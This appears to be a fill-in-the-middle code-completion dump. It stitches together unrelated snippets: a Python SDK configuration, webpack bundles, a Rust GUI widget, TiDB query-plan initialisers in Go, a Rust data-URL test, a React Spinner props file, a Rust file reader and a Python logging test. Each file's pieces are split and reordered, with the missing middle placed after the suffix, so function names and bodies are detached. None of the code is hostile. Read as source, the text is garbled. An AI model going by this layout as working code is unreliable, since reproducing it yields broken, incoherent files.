prefix = self.api_key_prefix.get(identifier)
if prefix:
return "%s %s" % (prefix, key)
else:
return key
def get_basic_auth_token(self):
"""Gets HTTP basic authentication header (string).
:return: The token for basic HTTP authentication.
"""
return urllib3.util.make_headers(
basic_auth=self.username + ':' + self.password
).get('authorization')
def auth_settings(self):
"""Gets Auth Settings dict for api client.
:return: The Auth Settings information dict.
"""
return {
'Apikey':
{
'type': 'api_key',
'in': 'header',
'key': 'Apikey',
'value': self.get_api_key_with_prefix('Apikey')
},
}
def to_debug_report(self):
"""Gets the essential information for debugging.
:return: The report for debugging.
"""
return "Python SDK Debug Report:\n"\
"OS: {env}\n"\
"Python Version: {pyversion}\n"\
"Version of the API: v1\n"\
"SDK Package Version: 3.0.2".\
format(env=sys.platform, pyversion=sys.version)
|
self.logger_stream_handler = None
# Log file handler
self.logger_file_handler = None
|
front.js
|
window["cms-plugincopyright"]=(()=>{var e={236:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n={}},788:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n={}},978:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n={}},137:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n={"zh-cn":r(978).Z}},292:(e,t,r)=>{"use strict";var n;r.r(t),r.d(t,{default:()=>o}),r(824);const o={install:function(e,t){return n?console.error("already installed."):(n=e,t({routes:r(644).Z,store:r(81).Z(n),config:r(788).Z,locales:r(137).Z,components:r(236).Z}))}}},644:(e,t,r)=>{"use strict";r.d(t,{Z:()=>n});const n=[]},81:(e,t,r)=>{"use strict";function
|
(e){return{state:{},getters:{},mutations:{},actions:{}}}r.d(t,{Z:()=>n})},891:(e,t,r)=>{var n=r(233),o=r(361)(n);o.push([e.id,"","",{version:3,sources:[],names:[],mappings:"",sourceRoot:""}]),e.exports=o},361:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function(){return this.map((function(t){var r=e(t);return t[2]?"@media ".concat(t[2]," {").concat(r,"}"):r})).join("")},t.i=function(e,r,n){"string"==typeof e&&(e=[[null,e,""]]);var o={};if(n)for(var a=0;a<this.length;a++){var s=this[a][0];null!=s&&(o[s]=!0)}for(var i=0;i<e.length;i++){var c=[].concat(e[i]);n&&o[c[0]]||(r&&(c[2]?c[2]="".concat(r," and ").concat(c[2]):c[2]=r),t.push(c))}},t}},233:e=>{"use strict";function t(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n}e.exports=function(e){var r,n,o=(n=4,function(e){if(Array.isArray(e))return e}(r=e)||function(e,t){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(e)){var r=[],n=!0,o=!1,a=void 0;try{for(var s,i=e[Symbol.iterator]();!(n=(s=i.next()).done)&&(r.push(s.value),!t||r.length!==t);n=!0);}catch(e){o=!0,a=e}finally{try{n||null==i.return||i.return()}finally{if(o)throw a}}return r}}(r,n)||function(e,r){if(e){if("string"==typeof e)return t(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);return"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"Set"===n?Array.from(e):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?t(e,r):void 0}}(r,n)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()),a=o[1],s=o[3];if("function"==typeof btoa){var i=btoa(unescape(encodeURIComponent(JSON.stringify(s)))),c="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(i),u="/*# ".concat(c," */"),l=s.sources.map((function(e){return"/*# sourceURL=".concat(s.sourceRoot||"").concat(e," */")}));return[a].concat(l).concat([u]).join("\n")}return[a].join("\n")}},824:(e,t,r)=>{var n=r(891);"string"==typeof n&&(n=[[e.id,n,""]]),n.locals&&(e.exports=n.locals),(0,r(159).Z)("14c3b990",n,!0,{})},159:(e,t,r)=>{"use strict";function n(e,t){for(var r=[],n={},o=0;o<t.length;o++){var a=t[o],s=a[0],i={id:e+":"+o,css:a[1],media:a[2],sourceMap:a[3]};n[s]?n[s].parts.push(i):r.push(n[s]={id:s,parts:[i]})}return r}r.d(t,{Z:()=>v});var o="undefined"!=typeof document;if("undefined"!=typeof DEBUG&&DEBUG&&!o)throw new Error("vue-style-loader cannot be used in a non-browser environment. Use { target: 'node' } in your Webpack config to indicate a server-rendering environment.");var a={},s=o&&(document.head||document.getElementsByTagName("head")[0]),i=null,c=0,u=!1,l=function(){},d=null,f="data-vue-ssr-id",p="undefined"!=typeof navigator&&/msie [6-9]\b/.test(navigator.userAgent.toLowerCase());function v(e,t,r,o){u=r,d=o||{};var s=n(e,t);return h(s),function(t){for(var r=[],o=0;o<s.length;o++){var i=s[o];(c=a[i.id]).refs--,r.push(c)}for(t?h(s=n(e,t)):s=[],o=0;o<r.length;o++){var c;if(0===(c=r[o]).refs){for(var u=0;u<c.parts.length;u++)c.parts[u]();delete a[c.id]}}}}function h(e){for(var t=0;t<e.length;t++){var r=e[t],n=a[r.id];if(n){n.refs++;for(var o=0;o<n.parts.length;o++)n.parts[o](r.parts[o]);for(;o<r.parts.length;o++)n.parts.push(m(r.parts[o]));n.parts.length>r.parts.length&&(n.parts.length=r.parts.length)}else{var s=[];for(o=0;o<r.parts.length;o++)s.push(m(r.parts[o]));a[r.id]={id:r.id,refs:1,parts:s}}}}function y(){var e=document.createElement("style");return e.type="text/css",s.appendChild(e),e}function m(e){var t,r,n=document.querySelector("style["+f+'~="'+e.id+'"]');if(n){if(u)return l;n.parentNode.removeChild(n)}if(p){var o=c++;n=i||(i=y()),t=S.bind(null,n,o,!1),r=S.bind(null,n,o,!0)}else n=y(),t=x.bind(null,n),r=function(){n.parentNode.removeChild(n)};return t(e),function(n){if(n){if(n.css===e.css&&n.media===e.media&&n.sourceMap===e.sourceMap)return;t(e=n)}else r()}}var g,b=(g=[],function(e,t){return g[e]=t,g.filter(Boolean).join("\n")});function S(e,t,r,n){var o=r?"":n.css;if(e.styleSheet)e.styleSheet.cssText=b(t,o);else{var a=document.createTextNode(o),s=e.childNodes;s[t]&&e.removeChild(s[t]),s.length?e.insertBefore(a,s[t]):e.appendChild(a)}}function x(e,t){var r=t.css,n=t.media,o=t.sourceMap;if(n&&e.setAttribute("media",n),d.ssrId&&e.setAttribute(f,t.id),o&&(r+="\n/*# sourceURL="+o.sources[0]+" */",r+="\n/*# sourceMappingURL=data:application/json;base64,"+btoa(unescape(encodeURIComponent(JSON.stringify(o))))+" */"),e.styleSheet)e.styleSheet.cssText=r;else{for(;e.firstChild;)e.removeChild(e.firstChild);e.appendChild(document.createTextNode(r))}}},142:e=>{function t(e){var t=new Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}t.keys=()=>[],t.resolve=t,t.id=142,e.exports=t}},t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={id:n,exports:{}};return e[n](o,o.exports,r),o.exports}return r.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return r.d(t,{a:t}),t},r.d=(e,t)=>{for(var n in t)r.o(t,n)&&!r.o(e,n)&&Object.defineProperty(e,n,{enumerable:!0,get:t[n]})},r.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),r.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r(292)})();
//# sourceMappingURL=front.js.map
|
n
|
jss-camel-case.js
|
(function webpackUniversalModuleDefinition(root, factory) {
if(typeof exports === 'object' && typeof module === 'object')
module.exports = factory();
else if(typeof define === 'function' && define.amd)
define([], factory);
else if(typeof exports === 'object')
exports["jssCamelCase"] = factory();
else
root["jssCamelCase"] = factory();
})(this, function() {
return /******/ (function(modules) { // webpackBootstrap
/******/ // The module cache
/******/ var installedModules = {};
/******/ // The require function
/******/ function
|
(moduleId) {
/******/ // Check if module is in cache
/******/ if(installedModules[moduleId])
/******/ return installedModules[moduleId].exports;
/******/ // Create a new module (and put it into the cache)
/******/ var module = installedModules[moduleId] = {
/******/ exports: {},
/******/ id: moduleId,
/******/ loaded: false
/******/ };
/******/ // Execute the module function
/******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);
/******/ // Flag the module as loaded
/******/ module.loaded = true;
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/ // expose the modules object (__webpack_modules__)
/******/ __webpack_require__.m = modules;
/******/ // expose the module cache
/******/ __webpack_require__.c = installedModules;
/******/ // __webpack_public_path__
/******/ __webpack_require__.p = "";
/******/ // Load entry module and return exports
/******/ return __webpack_require__(0);
/******/ })
/************************************************************************/
/******/ ([
/* 0 */
/***/ function(module, exports) {
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
var regExp = /([A-Z])/g;
/**
* Replace a string passed from String#replace.
* @param {String} str
* @return {String}
*/
function replace(str) {
return "-" + str.toLowerCase();
}
/**
* Convert camel cased property names to dash separated.
*
* @param {Object} style
* @return {Object}
*/
function convertCase(style) {
var converted = {};
for (var prop in style) {
var value = style[prop];
prop = prop.replace(regExp, replace);
converted[prop] = value;
}
if (style.fallbacks) {
if (Array.isArray(style.fallbacks)) converted.fallbacks = style.fallbacks.map(convertCase);else converted.fallbacks = convertCase(style.fallbacks);
}
return converted;
}
/**
* Allow camel cased property names by converting them back to dasherized.
*
* @param {Rule} rule
*/
exports["default"] = function () {
return function (rule) {
var style = rule.style;
if (!style) return;
if (Array.isArray(style)) {
// Handle rules like @font-face, which can have multiple styles in an array
for (var index = 0; index < style.length; index++) {
style[index] = convertCase(style[index]);
}
return;
}
rule.style = convertCase(style);
};
};
/***/ }
/******/ ])
});
;
|
__webpack_require__
|
gui.rs
|
use super::widget::Widget;
use super::bounds::WidgetBounds;
use super::layouts::layout::Layout;
use super::container::Container;
use super::gui_input_responder::GUIInputResponder;
use gui::core::graphics::Graphics;
use gui::core::mouse::{MouseClickEvent, MouseDragEvent, MouseMoveEvent};
use gui::core::keyboard::KeyEvent;
use gui::core::input_responder::InputResponder;
use gui::themes::theme::Theme;
use utils::shared::{share, Shared, WeakShared};
use utils::size::Size;
use std::rc::Rc;
use std::cell::{Ref, RefMut};
pub struct WidgetGUI {
theme: Theme,
root: Shared<Container>,
this: WeakShared<WidgetGUI>,
dragged: Option<WeakShared<Widget>>,
current_global_widget_id: u32
}
impl WidgetGUI {
pub fn new<L>(width: u32, height: u32, base_layout: L) -> Shared<Self> where L: 'static + Layout {
let root = share(Container::new(base_layout));
{
let mut root_ref = root.borrow_mut();
root_ref.base_mut().set_bounds(WidgetBounds::new(0, 0, width, height));
root_ref.set_preferred_size(Size::of(width, height));
root_ref.set_has_background(false);
}
let instance = share(WidgetGUI {
theme: Theme::light(),
root: root,
this: WeakShared::new(),
dragged: None,
current_global_widget_id: 0
});
{
let mut instance_ref = instance.borrow_mut();
let this = Rc::downgrade(&instance);
instance_ref.root.borrow_mut().set_gui(this.clone());
instance_ref.this = this;
}
instance
}
pub fn next_global_widget_id(&mut self) -> u32 {
let id = self.current_global_widget_id;
self.current_global_widget_id += 1;
id
}
pub fn root(&self) -> Shared<Container> { self.root.clone() }
pub fn borrow_root_mut(&self) -> RefMut<Container> { self.root.borrow_mut() }
pub fn borrow_root(&self) -> Ref<Container> { self.root.borrow() }
pub fn theme(&self) -> &Theme { &self.theme }
pub fn set_theme(&mut self, theme: Theme) { self.theme = theme }
pub fn dragged(&self) -> Option<WeakShared<Widget>>
|
pub fn set_dragged(&mut self, dragged: WeakShared<Widget>) { self.dragged = Some(dragged) }
pub fn render(&mut self, graphics: &mut Graphics) {
graphics.clear(self.theme.bg().strong());
let mut root = self.root.borrow_mut();
root.update_layout_if_needed(graphics);
root.render(graphics, &self.theme);
}
}
impl InputResponder for WidgetGUI {
fn on_mouse_down(&mut self, event: MouseClickEvent) -> bool {
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_mouse_down(self, event)
}
fn on_mouse_up(&mut self, event: MouseClickEvent) -> bool {
if let Some(weak_dragged) = self.dragged() {
// Only call mouseDrag event on the dragged widget when present
if let Some(dragged) = weak_dragged.upgrade() {
dragged.borrow_mut().on_mouse_up(self, event);
} else {
debug!("Warning: Dragged widget is present in GUI, but it's weak pointer does not point anywhere.");
}
self.dragged = None;
}
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_mouse_up(self, event)
}
fn on_mouse_move(&mut self, event: MouseMoveEvent) -> bool {
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_mouse_move(self, event)
}
fn on_mouse_drag(&mut self, event: MouseDragEvent) -> bool {
if let Some(weak_dragged) = self.dragged() {
// Only call mouseDrag event on the dragged widget when present
if let Some(dragged) = weak_dragged.upgrade() {
dragged.borrow_mut().on_mouse_drag(self, event);
} else {
debug!("Warning: Dragged widget is present in GUI, but it's weak pointer does not point anywhere.");
}
}
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_mouse_drag(self, event)
}
fn on_key_down(&mut self, event: KeyEvent) -> bool {
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_key_down(self, event)
}
fn on_key_up(&mut self, event: KeyEvent) -> bool {
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_key_up(self, event)
}
}
|
{ self.dragged.as_ref().map(|it| it.clone()) }
|
initialize.go
|
// Copyright 2017 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.
package plan
import (
"github.com/pingcap/tidb/context"
"github.com/pingcap/tidb/expression"
)
const (
// TypeSel is the type of Selection.
TypeSel = "Selection"
// TypeSet is the type of Set.
TypeSet = "Set"
// TypeProj is the type of Projection.
TypeProj = "Projection"
// TypeAgg is the type of Aggregation.
TypeAgg = "Aggregation"
// TypeStreamAgg is the type of StreamAgg.
TypeStreamAgg = "StreamAgg"
// TypeHashAgg is the type of HashAgg.
TypeHashAgg = "HashAgg"
// TypeCache is the type of cache.
TypeCache = "Cache"
// TypeShow is the type of show.
TypeShow = "Show"
// TypeJoin is the type of Join.
TypeJoin = "Join"
// TypeUnion is the type of Union.
TypeUnion = "Union"
// TypeTableScan is the type of TableScan.
TypeTableScan = "TableScan"
// TypeMemTableScan is the type of TableScan.
TypeMemTableScan = "MemTableScan"
// TypeUnionScan is the type of UnionScan.
TypeUnionScan = "UnionScan"
// TypeIdxScan is the type of IndexScan.
TypeIdxScan = "IndexScan"
// TypeSort is the type of Sort.
TypeSort = "Sort"
// TypeTopN is the type of TopN.
TypeTopN = "TopN"
// TypeLimit is the type of Limit.
TypeLimit = "Limit"
// TypeHashSemiJoin is the type of hash semi join.
TypeHashSemiJoin = "HashSemiJoin"
// TypeHashLeftJoin is the type of left hash join.
TypeHashLeftJoin = "HashLeftJoin"
// TypeHashRightJoin is the type of right hash join.
TypeHashRightJoin = "HashRightJoin"
// TypeMergeJoin is the type of merge join.
TypeMergeJoin = "MergeJoin"
// TypeIndexJoin is the type of index look up join.
TypeIndexJoin = "IndexJoin"
// TypeApply is the type of Apply.
TypeApply = "Apply"
// TypeMaxOneRow is the type of MaxOneRow.
TypeMaxOneRow = "MaxOneRow"
// TypeExists is the type of Exists.
TypeExists = "Exists"
// TypeDual is the type of TableDual.
TypeDual = "TableDual"
// TypeLock is the type of SelectLock.
TypeLock = "SelectLock"
// TypeInsert is the type of Insert
TypeInsert = "Insert"
// TypeUpate is the type of Update.
TypeUpate = "Update"
// TypeDelete is the type of Delete.
TypeDelete = "Delete"
// TypeIndexLookUp is the type of IndexLookUp.
TypeIndexLookUp = "IndexLookUp"
// TypeTableReader is the type of TableReader.
TypeTableReader = "TableReader"
// TypeIndexReader is the type of IndexReader.
TypeIndexReader = "IndexReader"
)
func (p LogicalAggregation) init(allocator *idAllocator, ctx context.Context) *LogicalAggregation {
p.basePlan = newBasePlan(TypeAgg, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
return &p
}
func (p LogicalJoin) init(allocator *idAllocator, ctx context.Context) *LogicalJoin {
p.basePlan = newBasePlan(TypeJoin, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
return &p
}
func (p DataSource) init(allocator *idAllocator, ctx context.Context) *DataSource {
p.basePlan = newBasePlan(TypeTableScan, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
return &p
}
func (p LogicalApply) init(allocator *idAllocator, ctx context.Context) *LogicalApply {
p.basePlan = newBasePlan(TypeApply, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
return &p
}
func (p Selection) init(allocator *idAllocator, ctx context.Context) *Selection {
p.basePlan = newBasePlan(TypeSel, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Projection) init(allocator *idAllocator, ctx context.Context) *Projection {
p.basePlan = newBasePlan(TypeProj, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Union) init(allocator *idAllocator, ctx context.Context) *Union {
p.basePlan = newBasePlan(TypeUnion, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Sort) init(allocator *idAllocator, ctx context.Context) *Sort {
p.basePlan = newBasePlan(TypeSort, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p TopN) init(allocator *idAllocator, ctx context.Context) *TopN {
p.basePlan = newBasePlan(TypeTopN, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Limit) init(allocator *idAllocator, ctx context.Context) *Limit {
p.basePlan = newBasePlan(TypeLimit, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p TableDual) init(allocator *idAllocator, ctx context.Context) *TableDual {
p.basePlan = newBasePlan(TypeDual, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Exists) init(allocator *idAllocator, ctx context.Context) *Exists {
p.basePlan = newBasePlan(TypeExists, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p MaxOneRow) init(allocator *idAllocator, ctx context.Context) *MaxOneRow {
p.basePlan = newBasePlan(TypeMaxOneRow, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Update) init(allocator *idAllocator, ctx context.Context) *Update {
p.basePlan = newBasePlan(TypeUpate, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Delete) init(allocator *idAllocator, ctx context.Context) *Delete {
p.basePlan = newBasePlan(TypeDelete, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Insert) init(allocator *idAllocator, ctx context.Context) *Insert {
p.basePlan = newBasePlan(TypeInsert, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Show) init(allocator *idAllocator, ctx context.Context) *Show {
p.basePlan = newBasePlan(TypeShow, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
|
p.basePlan = newBasePlan(TypeLock, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalTableScan) init(allocator *idAllocator, ctx context.Context) *PhysicalTableScan {
p.basePlan = newBasePlan(TypeTableScan, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalIndexScan) init(allocator *idAllocator, ctx context.Context) *PhysicalIndexScan {
p.basePlan = newBasePlan(TypeIdxScan, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalMemTable) init(allocator *idAllocator, ctx context.Context) *PhysicalMemTable {
p.basePlan = newBasePlan(TypeMemTableScan, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalHashJoin) init(allocator *idAllocator, ctx context.Context) *PhysicalHashJoin {
tp := TypeHashRightJoin
if p.SmallTable == 1 {
tp = TypeHashLeftJoin
}
p.basePlan = newBasePlan(tp, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalHashSemiJoin) init(allocator *idAllocator, ctx context.Context) *PhysicalHashSemiJoin {
p.basePlan = newBasePlan(TypeHashSemiJoin, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalMergeJoin) init(allocator *idAllocator, ctx context.Context) *PhysicalMergeJoin {
p.basePlan = newBasePlan(TypeMergeJoin, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalAggregation) init(allocator *idAllocator, ctx context.Context) *PhysicalAggregation {
tp := TypeHashAgg
if p.AggType == StreamedAgg {
tp = TypeStreamAgg
}
p.basePlan = newBasePlan(tp, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalApply) init(allocator *idAllocator, ctx context.Context) *PhysicalApply {
p.basePlan = newBasePlan(TypeApply, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Cache) init(allocator *idAllocator, ctx context.Context) *Cache {
p.basePlan = newBasePlan(TypeCache, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalUnionScan) init(allocator *idAllocator, ctx context.Context) *PhysicalUnionScan {
p.basePlan = newBasePlan(TypeUnionScan, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalIndexLookUpReader) init(allocator *idAllocator, ctx context.Context) *PhysicalIndexLookUpReader {
p.basePlan = newBasePlan(TypeIndexLookUp, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
p.TablePlans = flattenPushDownPlan(p.tablePlan)
p.IndexPlans = flattenPushDownPlan(p.indexPlan)
p.NeedColHandle = p.IndexPlans[0].(*PhysicalIndexScan).NeedColHandle
p.schema = p.tablePlan.Schema()
return &p
}
func (p PhysicalTableReader) init(allocator *idAllocator, ctx context.Context) *PhysicalTableReader {
p.basePlan = newBasePlan(TypeTableReader, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
p.TablePlans = flattenPushDownPlan(p.tablePlan)
p.NeedColHandle = p.TablePlans[0].(*PhysicalTableScan).NeedColHandle
p.schema = p.tablePlan.Schema()
return &p
}
func (p PhysicalIndexReader) init(allocator *idAllocator, ctx context.Context) *PhysicalIndexReader {
p.basePlan = newBasePlan(TypeIndexReader, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
p.IndexPlans = flattenPushDownPlan(p.indexPlan)
p.NeedColHandle = p.IndexPlans[0].(*PhysicalIndexScan).NeedColHandle
if _, ok := p.indexPlan.(*PhysicalAggregation); ok {
p.schema = p.indexPlan.Schema()
} else {
is := p.IndexPlans[0].(*PhysicalIndexScan)
p.schema = is.dataSourceSchema
}
p.OutputColumns = p.schema.Clone().Columns
return &p
}
func (p PhysicalIndexJoin) init(allocator *idAllocator, ctx context.Context, children ...Plan) *PhysicalIndexJoin {
p.basePlan = newBasePlan(TypeIndexJoin, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
p.children = children
p.schema = expression.MergeSchema(p.children[0].Schema(), p.children[1].Schema())
return &p
}
// flattenPushDownPlan converts a plan tree to a list, whose head is the leaf node like table scan.
func flattenPushDownPlan(p PhysicalPlan) []PhysicalPlan {
plans := make([]PhysicalPlan, 0, 5)
for {
plans = append(plans, p)
if len(p.Children()) == 0 {
break
}
p = p.Children()[0].(PhysicalPlan)
}
for i := 0; i < len(plans)/2; i++ {
j := len(plans) - i - 1
plans[i], plans[j] = plans[j], plans[i]
}
return plans
}
|
func (p SelectLock) init(allocator *idAllocator, ctx context.Context) *SelectLock {
|
_misc_.rs
|
// ██████╗ █████╗ ███████╗███████╗██╗███╗ ██╗ ██████╗
// ██╔══██╗██╔══██╗██╔════╝██╔════╝██║████╗ ██║██╔════╝
// ██████╔╝███████║███████╗███████╗██║██╔██╗ ██║██║ ███╗
// ██╔═══╝ ██╔══██║╚════██║╚════██║██║██║╚██╗██║██║ ██║
// ██║ ██║ ██║███████║███████║██║██║ ╚████║╚██████╔╝
// ╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝╚═╝╚═╝ ╚═══╝ ╚═════╝
#[cfg(test)]
mod passing {
use dataurl::{DataUrl, DataUrlParseError};
#[test]
fn must_have_correct_code_for_the_readme_usage_snippet() -> Result<(), DataUrlParseError> {
let data_url: DataUrl = DataUrl::parse("data:,Hello,%20World!")?;
assert_eq!(data_url.media_type(), "text/plain".to_string());
assert_eq!(data_url.media_type_no_default(), None);
assert_eq!(data_url.charset(), "US-ASCII".to_string());
assert_eq!(data_url.charset_no_default(), None);
assert!(!data_url.is_base64_encoded());
assert_eq!(
data_url.data(),
[72, 101, 108, 108, 111, 44, 32, 87, 111, 114, 108,
|
agment(), None);
assert_eq!(data_url.to_string(), "data:,Hello%2C%20World%21");
assert_eq!(data_url.text(), "Hello, World!");
Ok(())
}
}
|
100, 33]
);
assert_eq!(data_url.fr
|
Spinner.Props.ts
|
import * as React from 'react';
import { Spinner } from './Spinner';
export interface ISpinnerProps extends React.Props<Spinner> {
type?: SpinnerType;
label?: string;
className?: string;
}
export enum SpinnerType {
small,
normal,
|
}
|
large
|
util.rs
|
use std::fs::File;
use std::io::{self,BufRead};
use std::path::Path;
pub fn read_file(filename: &str) -> std::io::Result<Vec<i32>>
|
//tag::calculate-increases[]
pub fn calculate_increases(data : &Vec<i32>) -> std::io::Result<i32>
{
let mut sum = 0;
let l = data.len();
for ix in 1..l {
if data[ix] > data[ix-1] { sum+= 1; }
}
return Ok(sum);
}
//end::calculate-increases[]
//tag::calculate-window[]
pub fn calculate_window(data : &Vec<i32>) -> std::io::Result<Vec<i32>>
{
let l = data.len();
let mut data2 = Vec::new();
for ix in 2..l {
let window = data[ix] + data[ix-1] + data[ix-2];
data2.push(window)
}
return Ok(data2);
}
//end::calculate-window[]
|
{
let path = Path::new(filename);
let display = path.display();
// Open the path in read-only mode, returns `io::Result<File>`
let file = match File::open(&path) {
Err(why) => panic!("couldn't open {}: {}", display, why),
Ok(file) => file,
};
let lines = io::BufReader::new(file).lines();
let mut data = Vec::new();
for line in lines {
match line {
Err(why) => panic!("couldn't read line: {}", why),
Ok(l) => {
match l.parse::<i32>() {
Ok(v) => data.push(v),
Err(why) => panic!("couldn't parse: {}", why),
}
}
}
};
return Ok(data);
}
|
logging_utils_test.py
|
#!/usr/bin/env python
# Copyright 2014 The Swarming Authors. All rights reserved.
# Use of this source code is governed by the Apache v2.0 license that can be
# found in the LICENSE file.
import logging
import os
import sys
import tempfile
import shutil
import unittest
import re
# Import this first before manipulating sys.path to ensure it can load fine.
import logging_utils
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
import test_env
test_env.setup_test_env()
from depot_tools import auto_stub
_LOG_HEADER = r'^%s \d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d\d: ' % os.getpid()
class TestLoggingUtils(auto_stub.TestCase):
def test_Capture(self):
root = logging.RootLogger(logging.DEBUG)
with logging_utils.CaptureLogs('foo', root) as log:
root.debug('foo')
result = log.read()
self.assertTrue(re.match(_LOG_HEADER + 'DEBUG foo\n$', result), result)
def test_prepare_logging(self):
root = logging.RootLogger(logging.DEBUG)
tmp_dir = tempfile.mkdtemp(prefix='logging_utils_test')
try:
filepath = os.path.join(tmp_dir, 'test.log')
logging_utils.prepare_logging(filepath, root)
root.debug('foo')
with open(filepath, 'rb') as f:
result = f.read()
finally:
shutil.rmtree(tmp_dir)
# It'd be nice to figure out a way to ensure it's properly in UTC but it's
# tricky to do reliably.
self.assertTrue(re.match(_LOG_HEADER + 'DEBUG foo\n$', result), result)
|
if __name__ == '__main__':
unittest.main()
| |
kubectl-open_svc.go
|
package main
import (
"flag"
"os"
"github.com/spf13/pflag"
